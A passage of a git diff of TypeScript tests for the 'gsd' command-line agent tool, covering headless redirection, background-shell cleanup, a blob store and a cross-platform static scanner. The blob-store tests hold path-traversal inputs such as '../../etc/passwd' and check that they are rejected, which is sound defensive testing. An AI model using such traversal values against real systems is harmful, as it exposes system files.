+  assert.ok(isExplicitSubcommand("web"));
+});
+
+test("does NOT identify 'auto' as explicit subcommand", () => {
+  assert.ok(!isExplicitSubcommand("auto"));
+});
+
+test("does NOT identify undefined as explicit subcommand", () => {
+  assert.ok(!isExplicitSubcommand(undefined));
+});
+
+// ─── End-to-end scenario: gsd auto | cat ──────────────────────────────────
+
+test("scenario: 'gsd auto 2>&1 | cat' — should redirect to headless", () => {
+  // Simulates: subcommand = "auto", stdin is TTY, stdout is piped
+  const subcommand = "auto";
+  const stdinIsTTY = true;
+  const stdoutIsTTY = false;
+
+  // Interactive mode should be blocked
+  assert.ok(!canEnterInteractiveMode(stdinIsTTY, stdoutIsTTY));
+
+  // Auto should be redirected to headless
+  assert.ok(shouldRedirectAutoToHeadless(subcommand, stdoutIsTTY));
+});
+
+test("scenario: 'gsd auto > /tmp/output.txt' — should redirect to headless", () => {
+  const subcommand = "auto";
+  const stdinIsTTY = true;
+  const stdoutIsTTY = false;
+
+  assert.ok(!canEnterInteractiveMode(stdinIsTTY, stdoutIsTTY));
+  assert.ok(shouldRedirectAutoToHeadless(subcommand, stdoutIsTTY));
+});
+
+test("scenario: 'gsd auto' in terminal — normal interactive mode", () => {
+  const subcommand = "auto";
+  const stdinIsTTY = true;
+  const stdoutIsTTY = true;
+
+  assert.ok(canEnterInteractiveMode(stdinIsTTY, stdoutIsTTY));
+  assert.ok(!shouldRedirectAutoToHeadless(subcommand, stdoutIsTTY));
+});
+
+test("scenario: 'echo msg | gsd auto' — stdin piped, should redirect", () => {
+  const subcommand = "auto";
+  const stdinIsTTY = false;
+  const stdoutIsTTY = true; // stdout is TTY even though stdin is piped
+
+  // stdout is TTY, so auto redirect doesn't trigger...
+  assert.ok(!shouldRedirectAutoToHeadless(subcommand, stdoutIsTTY));
+  // ...but interactive mode is blocked because stdin is piped
+  assert.ok(!canEnterInteractiveMode(stdinIsTTY, stdoutIsTTY));
+});
+
+test("scenario: 'echo msg | gsd auto | cat' — both piped", () => {
+  const subcommand = "auto";
+  const stdinIsTTY = false;
+  const stdoutIsTTY = false;
+
+  assert.ok(!canEnterInteractiveMode(stdinIsTTY, stdoutIsTTY));
+  assert.ok(shouldRedirectAutoToHeadless(subcommand, stdoutIsTTY));
+});
diff --git a/src/tests/bg-shell-persistence-cwd.test.ts b/src/tests/bg-shell-persistence-cwd.test.ts
index f1277b1e7..15e63f8e5 100644
--- a/src/tests/bg-shell-persistence-cwd.test.ts
+++ b/src/tests/bg-shell-persistence-cwd.test.ts
@@ -1,7 +1,10 @@
 import test from "node:test";
 import assert from "node:assert/strict";
 
-import { resolveBgShellPersistenceCwd } from "../resources/extensions/bg-shell/utilities.ts";
+import {
+  getBgShellLiveCwd,
+  resolveBgShellPersistenceCwd,
+} from "../resources/extensions/bg-shell/utilities.ts";
 
 test("keeps non-worktree cwd unchanged", () => {
   const cached = "/repo";
@@ -43,3 +46,18 @@ test("keeps current auto-worktree cwd when it still matches process cwd", () =>
     cached,
   );
 });
+
+test("falls back to project root when process.cwd throws inside a stale auto-worktree", () => {
+  const cached = "/repo/.gsd/worktrees/M001";
+  const live = getBgShellLiveCwd(
+    cached,
+    (path) => path === "/repo",
+    () => {
+      throw Object.assign(new Error("uv_cwd"), { code: "ENOENT", syscall: "uv_cwd" });
+    },
+    () => {},
+  );
+
+  assert.equal(live, "/repo");
+  assert.equal(resolveBgShellPersistenceCwd(cached, live, (path) => path === "/repo"), "/repo");
+});
diff --git a/src/tests/bg-shell-session-cleanup.test.ts b/src/tests/bg-shell-session-cleanup.test.ts
index 6ac74f7f1..9e3a51893 100644
--- a/src/tests/bg-shell-session-cleanup.test.ts
+++ b/src/tests/bg-shell-session-cleanup.test.ts
@@ -22,7 +22,8 @@ function isPidAlive(pid: number | undefined): boolean {
 // without relying on platform-specific quoting for `node -e "..."`
 const sleeperCommand = "sleep 30";
 
-test("cleanupSessionProcesses reaps only session-scoped processes from the previous session", async () => {
+test("cleanupSessionProcesses reaps only session-scoped processes from the previous session", async (t) => {
+	t.after(cleanupAll);
 	const owned = startProcess({
 		command: sleeperCommand,
 		cwd: process.cwd(),
@@ -40,22 +41,18 @@ test("cleanupSessionProcesses reaps only session-scoped processes from the previ
 		ownerSessionFile: "session-b",
 	});
 
-	try {
-		await new Promise((resolve) => setTimeout(resolve, 150));
-		assert.equal(isPidAlive(owned.proc.pid), true, "owned process should be alive before cleanup");
-		assert.equal(isPidAlive(persistent.proc.pid), true, "persistent process should be alive before cleanup");
-		assert.equal(isPidAlive(foreign.proc.pid), true, "foreign process should be alive before cleanup");
+	await new Promise((resolve) => setTimeout(resolve, 150));
+	assert.equal(isPidAlive(owned.proc.pid), true, "owned process should be alive before cleanup");
+	assert.equal(isPidAlive(persistent.proc.pid), true, "persistent process should be alive before cleanup");
+	assert.equal(isPidAlive(foreign.proc.pid), true, "foreign process should be alive before cleanup");
 
-		const removed = await cleanupSessionProcesses("session-a", { graceMs: 200 });
-		assert.deepEqual(removed.sort(), [owned.id], "only the session-scoped process should be reaped");
+	const removed = await cleanupSessionProcesses("session-a", { graceMs: 200 });
+	assert.deepEqual(removed.sort(), [owned.id], "only the session-scoped process should be reaped");
 
-		await new Promise((resolve) => setTimeout(resolve, 150));
-		assert.equal(isPidAlive(owned.proc.pid), false, "owned process should be terminated");
-		assert.equal(isPidAlive(persistent.proc.pid), true, "persistent process should survive cleanup");
-		assert.equal(isPidAlive(foreign.proc.pid), true, "foreign process should survive cleanup");
-		assert.equal(processes.get(owned.id)?.persistAcrossSessions, false);
-		assert.equal(processes.get(persistent.id)?.persistAcrossSessions, true);
-	} finally {
-		cleanupAll();
-	}
+	await new Promise((resolve) => setTimeout(resolve, 150));
+	assert.equal(isPidAlive(owned.proc.pid), false, "owned process should be terminated");
+	assert.equal(isPidAlive(persistent.proc.pid), true, "persistent process should survive cleanup");
+	assert.equal(isPidAlive(foreign.proc.pid), true, "foreign process should survive cleanup");
+	assert.equal(processes.get(owned.id)?.persistAcrossSessions, false);
+	assert.equal(processes.get(persistent.id)?.persistAcrossSessions, true);
 });
diff --git a/src/tests/blob-store.test.ts b/src/tests/blob-store.test.ts
index d5ad2cf41..6f2922b81 100644
--- a/src/tests/blob-store.test.ts
+++ b/src/tests/blob-store.test.ts
@@ -33,131 +33,101 @@ function sha256(data: Buffer): string {
 // BlobStore.put / get / has
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('put stores data and returns correct hash', () => {
+test('put stores data and returns correct hash', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		const data = Buffer.from('hello world')
-		const result = store.put(data)
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	const data = Buffer.from('hello world')
+	const result = store.put(data)
 
-		assert.equal(result.hash, sha256(data))
-		assert.ok(existsSync(result.path))
-		assert.deepEqual(readFileSync(result.path), data)
-	} finally {
-		cleanup()
-	}
+	assert.equal(result.hash, sha256(data))
+	assert.ok(existsSync(result.path))
+	assert.deepEqual(readFileSync(result.path), data)
 })
 
-test('put is idempotent — same data returns same hash, no duplicate write', () => {
+test('put is idempotent — same data returns same hash, no duplicate write', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		const data = Buffer.from('duplicate test')
-		const r1 = store.put(data)
-		const r2 = store.put(data)
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	const data = Buffer.from('duplicate test')
+	const r1 = store.put(data)
+	const r2 = store.put(data)
 
-		assert.equal(r1.hash, r2.hash)
-		assert.equal(r1.path, r2.path)
-	} finally {
-		cleanup()
-	}
+	assert.equal(r1.hash, r2.hash)
+	assert.equal(r1.path, r2.path)
 })
 
-test('get retrieves stored data', () => {
+test('get retrieves stored data', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		const data = Buffer.from('retrieve me')
-		const { hash } = store.put(data)
-		const retrieved = store.get(hash)
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	const data = Buffer.from('retrieve me')
+	const { hash } = store.put(data)
+	const retrieved = store.get(hash)
 
-		assert.deepEqual(retrieved, data)
-	} finally {
-		cleanup()
-	}
+	assert.deepEqual(retrieved, data)
 })
 
-test('get returns null for nonexistent hash', () => {
+test('get returns null for nonexistent hash', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		const fakeHash = 'a'.repeat(64)
-		assert.equal(store.get(fakeHash), null)
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	const fakeHash = 'a'.repeat(64)
+	assert.equal(store.get(fakeHash), null)
 })
 
-test('has returns true for stored blob', () => {
+test('has returns true for stored blob', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		const { hash } = store.put(Buffer.from('exists'))
-		assert.ok(store.has(hash))
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	const { hash } = store.put(Buffer.from('exists'))
+	assert.ok(store.has(hash))
 })
 
-test('has returns false for missing blob', () => {
+test('has returns false for missing blob', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		assert.equal(store.has('b'.repeat(64)), false)
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	assert.equal(store.has('b'.repeat(64)), false)
 })
 
-test('ref property returns correct blob: URI', () => {
+test('ref property returns correct blob: URI', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		const data = Buffer.from('ref test')
-		const result = store.put(data)
-		assert.equal(result.ref, `blob:sha256:${result.hash}`)
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	const data = Buffer.from('ref test')
+	const result = store.put(data)
+	assert.equal(result.ref, `blob:sha256:${result.hash}`)
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Path traversal protection
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('get rejects non-hex hash (path traversal attempt)', () => {
+test('get rejects non-hex hash (path traversal attempt)', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		assert.equal(store.get('../../etc/passwd'), null)
-		assert.equal(store.get('../../../foo'), null)
-		assert.equal(store.get('not-a-valid-hash'), null)
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	assert.equal(store.get('../../etc/passwd'), null)
+	assert.equal(store.get('../../../foo'), null)
+	assert.equal(store.get('not-a-valid-hash'), null)
 })
 
-test('has rejects non-hex hash', () => {
+test('has rejects non-hex hash', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		assert.equal(store.has('../../etc/passwd'), false)
-		assert.equal(store.has('short'), false)
-		assert.equal(store.has('Z'.repeat(64)), false) // uppercase not valid
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	assert.equal(store.has('../../etc/passwd'), false)
+	assert.equal(store.has('short'), false)
+	assert.equal(store.has('Z'.repeat(64)), false) // uppercase not valid
 })
 
-test('get rejects hash with wrong length', () => {
+test('get rejects hash with wrong length', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		assert.equal(store.get('a'.repeat(63)), null) // too short
-		assert.equal(store.get('a'.repeat(65)), null) // too long
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	assert.equal(store.get('a'.repeat(63)), null) // too short
+	assert.equal(store.get('a'.repeat(65)), null) // too long
 })
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -190,62 +160,47 @@ test('parseBlobRef rejects invalid hash format', () => {
 // externalizeImageData / resolveImageData
 // ═══════════════════════════════════════════════════════════════════════════
 
-test('externalizeImageData stores base64 and returns blob ref', () => {
+test('externalizeImageData stores base64 and returns blob ref', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		const base64 = Buffer.from('image bytes').toString('base64')
-		const ref = externalizeImageData(store, base64)
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	const base64 = Buffer.from('image bytes').toString('base64')
+	const ref = externalizeImageData(store, base64)
 
-		assert.ok(ref.startsWith('blob:sha256:'))
-		assert.ok(store.has(parseBlobRef(ref)!))
-	} finally {
-		cleanup()
-	}
+	assert.ok(ref.startsWith('blob:sha256:'))
+	assert.ok(store.has(parseBlobRef(ref)!))
 })
 
-test('externalizeImageData passes through existing blob refs', () => {
+test('externalizeImageData passes through existing blob refs', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		const existingRef = `blob:sha256:${'c'.repeat(64)}`
-		assert.equal(externalizeImageData(store, existingRef), existingRef)
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	const existingRef = `blob:sha256:${'c'.repeat(64)}`
+	assert.equal(externalizeImageData(store, existingRef), existingRef)
 })
 
-test('resolveImageData round-trips with externalizeImageData', () => {
+test('resolveImageData round-trips with externalizeImageData', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		const base64 = Buffer.from('round trip test').toString('base64')
-		const ref = externalizeImageData(store, base64)
-		const resolved = resolveImageData(store, ref)
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	const base64 = Buffer.from('round trip test').toString('base64')
+	const ref = externalizeImageData(store, base64)
+	const resolved = resolveImageData(store, ref)
 
-		assert.equal(resolved, base64)
-	} finally {
-		cleanup()
-	}
+	assert.equal(resolved, base64)
 })
 
-test('resolveImageData returns non-ref strings unchanged', () => {
+test('resolveImageData returns non-ref strings unchanged', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		assert.equal(resolveImageData(store, 'plain text'), 'plain text')
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	assert.equal(resolveImageData(store, 'plain text'), 'plain text')
 })
 
-test('resolveImageData returns ref unchanged when blob is missing', () => {
+test('resolveImageData returns ref unchanged when blob is missing', (t) => {
 	const { dir, cleanup } = makeTmpDir()
-	try {
-		const store = new BlobStore(join(dir, 'blobs'))
-		const missingRef = `blob:sha256:${'d'.repeat(64)}`
-		assert.equal(resolveImageData(store, missingRef), missingRef)
-	} finally {
-		cleanup()
-	}
+	t.after(cleanup);
+	const store = new BlobStore(join(dir, 'blobs'))
+	const missingRef = `blob:sha256:${'d'.repeat(64)}`
+	assert.equal(resolveImageData(store, missingRef), missingRef)
 })
diff --git a/src/tests/bridge-package-root.test.ts b/src/tests/bridge-package-root.test.ts
new file mode 100644
index 000000000..8e46101ff
--- /dev/null
+++ b/src/tests/bridge-package-root.test.ts
@@ -0,0 +1,71 @@
+import test from 'node:test'
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import { join } from 'node:path'
+
+/**
+ * Regression test for #1881: Windows web mode — hardcoded Linux CI path in
+ * standalone build.
+ *
+ * The Next.js standalone build bakes import.meta.url into compiled chunks as
+ * the CI runner's absolute Linux path (file:///home/runner/work/gsd-2/gsd-2/…).
+ * On Windows, fileURLToPath() rejects this with "File URL path must be
+ * absolute". The fix wraps the derivation in safePackageRootFromImportUrl()
+ * so the module-level constant never throws, and resolveBridgeRuntimeConfig
+ * falls through to the GSD_WEB_PACKAGE_ROOT env var.
+ */
+
+import { safePackageRootFromImportUrl } from '../web/safe-import-meta-resolve.ts'
+
+test('safePackageRootFromImportUrl returns a path for a valid native file URL', () => {
+  const result = safePackageRootFromImportUrl(import.meta.url)
+  assert.ok(result !== null, 'should return a path for a valid native file URL')
+  assert.ok(typeof result === 'string')
+  assert.ok(result.length > 0)
+})
+
+test('safePackageRootFromImportUrl returns null for a non-file URL', () => {
+  const result = safePackageRootFromImportUrl('https://example.com/foo/bar.ts')
+  assert.equal(result, null)
+})
+
+test('safePackageRootFromImportUrl returns null for empty input', () => {
+  const result = safePackageRootFromImportUrl('')
+  assert.equal(result, null)
+})
+
+test('safePackageRootFromImportUrl returns null for malformed URL', () => {
+  const result = safePackageRootFromImportUrl('not-a-url')
+  assert.equal(result, null)
+})
+
+test('safePackageRootFromImportUrl respects ancestorLevels', () => {
+  // With 0 levels, should return the directory of the module itself
+  const level0 = safePackageRootFromImportUrl(import.meta.url, 0)
+  const level2 = safePackageRootFromImportUrl(import.meta.url, 2)
+  assert.ok(level0 !== null)
+  assert.ok(level2 !== null)
+  // level0 is deeper than level2
+  assert.ok(level0.length > level2.length)
+})
+
+test('bridge-service.ts uses safePackageRootFromImportUrl for DEFAULT_PACKAGE_ROOT', () => {
+  const source = readFileSync(join(process.cwd(), 'src', 'web', 'bridge-service.ts'), 'utf-8')
+  assert.ok(
+    source.includes('safePackageRootFromImportUrl(import.meta.url)'),
+    'bridge-service.ts must derive DEFAULT_PACKAGE_ROOT via the safe helper',
+  )
+  const rawPattern = 'const DEFAULT_PACKAGE_ROOT = resolve(dirname(fileURLToPath(import.meta.url'
+  assert.ok(
+    !source.includes(rawPattern),
+    'bridge-service.ts must not use raw fileURLToPath for DEFAULT_PACKAGE_ROOT',
+  )
+})
+
+test('bridge-service resolveBridgeRuntimeConfig falls back to lazy default', () => {
+  const source = readFileSync(join(process.cwd(), 'src', 'web', 'bridge-service.ts'), 'utf-8')
+  assert.ok(
+    source.includes('env.GSD_WEB_PACKAGE_ROOT || getDefaultPackageRoot()'),
+    'resolveBridgeRuntimeConfig must fall back to lazy default package root',
+  )
+})
diff --git a/src/tests/create-gsd-extension-paths.test.ts b/src/tests/create-gsd-extension-paths.test.ts
new file mode 100644
index 000000000..7aff613b3
--- /dev/null
+++ b/src/tests/create-gsd-extension-paths.test.ts
@@ -0,0 +1,76 @@
+/**
+ * Validates that the create-gsd-extension skill documentation uses the correct
+ * community extension install path (~/.pi/agent/extensions/) instead of the
+ * bundled-only path (~/.gsd/agent/extensions/).
+ *
+ * Bug: https://github.com/gsd-build/gsd-2/issues/3131
+ *
+ * ~/.gsd/agent/extensions/ is reserved for bundled extensions synced from
+ * the gsd-pi package. Community/user extensions must use ~/.pi/agent/extensions/.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const skillDir = join(__dirname, "..", "resources", "skills", "create-gsd-extension");
+
+function readSkillFile(relativePath: string): string {
+  return readFileSync(join(skillDir, relativePath), "utf-8");
+}
+
+// All documentation files that reference community extension paths
+const docsToCheck: { file: string; label: string }[] = [
+  { file: "SKILL.md", label: "SKILL.md" },
+  { file: "references/key-rules-gotchas.md", label: "key-rules-gotchas.md" },
+  { file: "workflows/add-capability.md", label: "add-capability.md" },
+  { file: "workflows/create-extension.md", label: "create-extension.md" },
+  { file: "workflows/debug-extension.md", label: "debug-extension.md" },
+];
+
+test("create-gsd-extension docs use ~/.pi/agent/extensions/ for community extensions", async (t) => {
+  for (const { file, label } of docsToCheck) {
+    await t.test(`${label} references ~/.pi/agent/extensions/ for global extensions`, () => {
+      const content = readSkillFile(file);
+
+      // The doc should reference ~/.pi/agent/extensions/ (community path)
+      assert.ok(
+        content.includes("~/.pi/agent/extensions/"),
+        `${label} should reference ~/.pi/agent/extensions/ for community extensions`,
+      );
+    });
+  }
+});
+
+test("create-gsd-extension docs do NOT direct users to install in ~/.gsd/agent/extensions/", async (t) => {
+  for (const { file, label } of docsToCheck) {
+    await t.test(`${label} does not tell users to place extensions in ~/.gsd/agent/extensions/`, () => {
+      const content = readSkillFile(file);
+
+      // ~/.gsd/agent/extensions/ should only appear in context that clearly marks
+      // it as reserved/bundled, never as an install target for community extensions.
+      // We check that it does NOT appear as a "Global extensions:" or "Global:" path directive.
+      const lines = content.split("\n");
+      for (let i = 0; i < lines.length; i++) {
+        const line = lines[i];
+        if (line.includes("~/.gsd/agent/extensions/")) {
+          // If the line references ~/.gsd/agent/extensions/, it must be in a
+          // context explaining it is reserved/bundled — not as an install instruction.
+          const context = lines.slice(Math.max(0, i - 2), i + 3).join("\n");
+          const isBundledContext =
+            context.toLowerCase().includes("bundled") ||
+            context.toLowerCase().includes("reserved") ||
+            context.toLowerCase().includes("synced");
+          assert.ok(
+            isBundledContext,
+            `${label} line ${i + 1} references ~/.gsd/agent/extensions/ without ` +
+            `marking it as bundled/reserved. Context:\n${context}`,
+          );
+        }
+      }
+    });
+  }
+});
diff --git a/src/tests/cross-platform-filesystem-safety.test.ts b/src/tests/cross-platform-filesystem-safety.test.ts
new file mode 100644
index 000000000..84e5b2790
--- /dev/null
+++ b/src/tests/cross-platform-filesystem-safety.test.ts
@@ -0,0 +1,308 @@
+/**
+ * Cross-platform filesystem safety — static analysis guard.
+ *
+ * Scans ALL production .ts files and flags patterns that break on
+ * Windows, Linux, or macOS. Modelled after the git-locale static
+ * check in src/resources/extensions/gsd/tests/git-locale.test.ts.
+ *
+ * Patterns 1, 3, 4 → hard fail (clear bugs).
+ * Patterns 2, 5, 6 → warn only (logged, no assertion failure).
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readdirSync, readFileSync } from "node:fs";
+import { join, relative } from "node:path";
+
+// ─── File collection ────────────────────────────────────────────────────────
+
+const SRC_ROOT = join(import.meta.dirname, "..");
+
+interface SourceFile {
+  /** Absolute path */
+  abs: string;
+  /** Path relative to src/ for display */
+  rel: string;
+  content: string;
+  lines: string[];
+}
+
+function collectProductionFiles(dir: string): SourceFile[] {
+  const results: SourceFile[] = [];
+  for (const entry of readdirSync(dir, { withFileTypes: true })) {
+    const full = join(dir, entry.name);
+    if (entry.isDirectory()) {
+      if (["node_modules", "dist", "tests"].includes(entry.name)) continue;
+      results.push(...collectProductionFiles(full));
+      continue;
+    }
+    if (!entry.name.endsWith(".ts")) continue;
+    if (entry.name.endsWith(".test.ts") || entry.name.endsWith(".spec.ts")) continue;
+    const content = readFileSync(full, "utf-8");
+    results.push({
+      abs: full,
+      rel: relative(SRC_ROOT, full).replaceAll("\\", "/"),
+      content,
+      lines: content.split("\n"),
+    });
+  }
+  return results;
+}
+
+// ─── Violation helpers ──────────────────────────────────────────────────────
+
+interface Violation {
+  file: string;
+  line: number;
+  text: string;
+  reason: string;
+}
+
+function formatViolations(violations: Violation[]): string {
+  return violations
+    .map((v) => `  ${v.file}:${v.line}  ${v.reason}\n    > ${v.text.trim()}`)
+    .join("\n\n");
+}
+
+// ─── Allowlists ─────────────────────────────────────────────────────────────
+// Each entry: [relative path from src/, line substring that makes it safe].
+// Every entry must have a comment explaining why it is safe.
+
+/** Pattern 1 — hardcoded /tmp */
+const ALLOW_HARDCODED_TMP: Array<[string, string]> = [
+  // cmux DEFAULT_SOCKET_PATH is a Unix-domain socket convention; cmux is
+  // macOS/Linux only and the path is overridden by $CMUX_SOCKET at runtime.
+  ["resources/extensions/cmux/index.ts", 'DEFAULT_SOCKET_PATH = "/tmp/cmux.sock"'],
+];
+
+/** Pattern 4 — shell commands with interpolated variables */
+const ALLOW_SHELL_INTERPOLATION: Array<[string, string]> = [
+  // NPM_PACKAGE is a compile-time constant ('gsd-pi'), not user input.
+  ["update-cmd.ts", "npm view ${NPM_PACKAGE}"],
+  ["update-cmd.ts", "npm install -g ${NPM_PACKAGE}"],
+  ["update-check.ts", "npm install -g ${NPM_PACKAGE_NAME}"],
+  // Same constant forwarded through commands-handlers.
+  ["resources/extensions/gsd/commands-handlers.ts", "npm view ${NPM_PACKAGE}"],
+  ["resources/extensions/gsd/commands-handlers.ts", "npm install -g ${NPM_PACKAGE}"],
+];
+
+function isAllowlisted(
+  allowlist: Array<[string, string]>,
+  rel: string,
+  lineText: string,
+): boolean {
+  return allowlist.some(
+    ([path, substr]) => rel === path && lineText.includes(substr),
+  );
+}
+
+// ─── Tests ──────────────────────────────────────────────────────────────────
+
+describe("Cross-platform filesystem safety (static analysis)", () => {
+  const files = collectProductionFiles(SRC_ROOT);
+
+  test("scanned a reasonable number of production files", () => {
+    // Sanity check: we should find hundreds of .ts files.
+    assert.ok(
+      files.length > 50,
+      `Expected >50 production .ts files, found ${files.length}`,
+    );
+  });
+
+  // ── Pattern 1: Hardcoded /tmp ───────────────────────────────────────────
+  test("no hardcoded /tmp paths (use os.tmpdir())", () => {
+    const violations: Violation[] = [];
+    const tmpPattern = /["'`]\/tmp\//;
+
+    for (const f of files) {
+      for (let i = 0; i < f.lines.length; i++) {
+        const line = f.lines[i];
+        // Skip comments
+        if (line.trimStart().startsWith("//") || line.trimStart().startsWith("*")) continue;
+        if (!tmpPattern.test(line)) continue;
+        if (isAllowlisted(ALLOW_HARDCODED_TMP, f.rel, line)) continue;
+        violations.push({
+          file: f.rel,
+          line: i + 1,
+          text: line,
+          reason: 'Hardcoded "/tmp/" — use os.tmpdir() or tmpdir() for cross-platform safety',
+        });
+      }
+    }
+
+    assert.equal(
+      violations.length,
+      0,
+      `Found ${violations.length} hardcoded /tmp path(s):\n\n${formatViolations(violations)}`,
+    );
+  });
+
+  // ── Pattern 2: Hardcoded path separators (WARN) ─────────────────────────
+  test("warn on string concatenation with hardcoded path separators", () => {
+    const violations: Violation[] = [];
+    // Match: someVar + "/" + otherVar  or  someVar + '/' + otherVar
+    const concatPattern = /\+\s*["']\/["']\s*\+/;
+
+    for (const f of files) {
+      for (let i = 0; i < f.lines.length; i++) {
+        const line = f.lines[i];
+        if (line.trimStart().startsWith("//") || line.trimStart().startsWith("*")) continue;
+        if (!concatPattern.test(line)) continue;
+        violations.push({
+          file: f.rel,
+          line: i + 1,
+          text: line,
+          reason: "String concatenation with \"/\" — consider path.join()",
+        });
+      }
+    }
+
+    if (violations.length > 0) {
+      console.log(
+        `[WARN] ${violations.length} hardcoded path separator(s) found (non-blocking):\n\n${formatViolations(violations)}`,
+      );
+    }
+    // Warn only — do not fail
+  });
+
+  // ── Pattern 3: rmSync/rmdir without force: true ─────────────────────────
+  test("rmSync calls include force: true (Windows read-only files)", () => {
+    const violations: Violation[] = [];
+    const rmSyncCall = /\brmSync\s*\(/;
+
+    for (const f of files) {
+      for (let i = 0; i < f.lines.length; i++) {
+        const line = f.lines[i];
+        if (line.trimStart().startsWith("//") || line.trimStart().startsWith("*")) continue;
+        if (!rmSyncCall.test(line)) continue;
+
+        // Gather a window of lines to check for force: true
+        const window = f.lines.slice(i, Math.min(i + 6, f.lines.length)).join(" ");
+        if (/force\s*:\s*true/.test(window)) continue;
+
+        violations.push({
+          file: f.rel,
+          line: i + 1,
+          text: line,
+          reason: "rmSync() without force: true — fails on Windows read-only files (.git)",
+        });
+      }
+    }
+
+    assert.equal(
+      violations.length,
+      0,
+      `Found ${violations.length} rmSync call(s) missing force: true:\n\n${formatViolations(violations)}`,
+    );
+  });
+
+  // ── Pattern 4: Shell commands with unescaped path interpolation ─────────
+  test("no unescaped path interpolation in shell commands", () => {
+    const violations: Violation[] = [];
+    // Match execSync(` ... ${ — template literal with interpolation
+    const shellInterp = /\b(execSync|spawnSync)\s*\(\s*`[^`]*\$\{/;
+
+    for (const f of files) {
+      for (let i = 0; i < f.lines.length; i++) {
+        const line = f.lines[i];
+        if (line.trimStart().startsWith("//") || line.trimStart().startsWith("*")) continue;
+        if (!shellInterp.test(line)) continue;
+        if (isAllowlisted(ALLOW_SHELL_INTERPOLATION, f.rel, line)) continue;
+        violations.push({
+          file: f.rel,
+          line: i + 1,
+          text: line,
+          reason: "Template literal interpolation inside execSync/spawnSync — paths may contain spaces or special chars",
+        });
+      }
+    }
+
+    assert.equal(
+      violations.length,
+      0,
+      `Found ${violations.length} unescaped shell interpolation(s):\n\n${formatViolations(violations)}`,
+    );
+  });
+
+  // ── Pattern 5: TOCTOU existsSync + unlinkSync/rmSync (WARN) ────────────
+  test("warn on existsSync + delete TOCTOU patterns", () => {
+    const violations: Violation[] = [];
+
+    for (const f of files) {
+      for (let i = 0; i < f.lines.length; i++) {
+        const line = f.lines[i];
+        if (line.trimStart().startsWith("//") || line.trimStart().startsWith("*")) continue;
+        if (!/existsSync\s*\(/.test(line)) continue;
+
+        // Look ahead up to 5 lines for a matching unlinkSync or rmSync
+        const ahead = f.lines.slice(i + 1, Math.min(i + 6, f.lines.length));
+        const hasDelete = ahead.some(
+          (l) => /\b(unlinkSync|rmSync)\s*\(/.test(l),
+        );
+        if (!hasDelete) continue;
+
+        violations.push({
+          file: f.rel,
+          line: i + 1,
+          text: line,
+          reason: "TOCTOU: existsSync() followed by delete — file may vanish between check and action",
+        });
+      }
+    }
+
+    if (violations.length > 0) {
+      console.log(
+        `[WARN] ${violations.length} potential TOCTOU pattern(s) found (non-blocking):\n\n${formatViolations(violations)}`,
+      );
+    }
+    // Warn only — do not fail
+  });
+
+  // ── Pattern 6: recursive rmSync without containment check (WARN) ───────
+  test("warn on recursive rmSync without nearby containment validation", () => {
+    const violations: Violation[] = [];
+    // Only flag lines that actually contain an rmSync call with recursive: true
+    const rmSyncLine = /\brmSync\s*\(/;
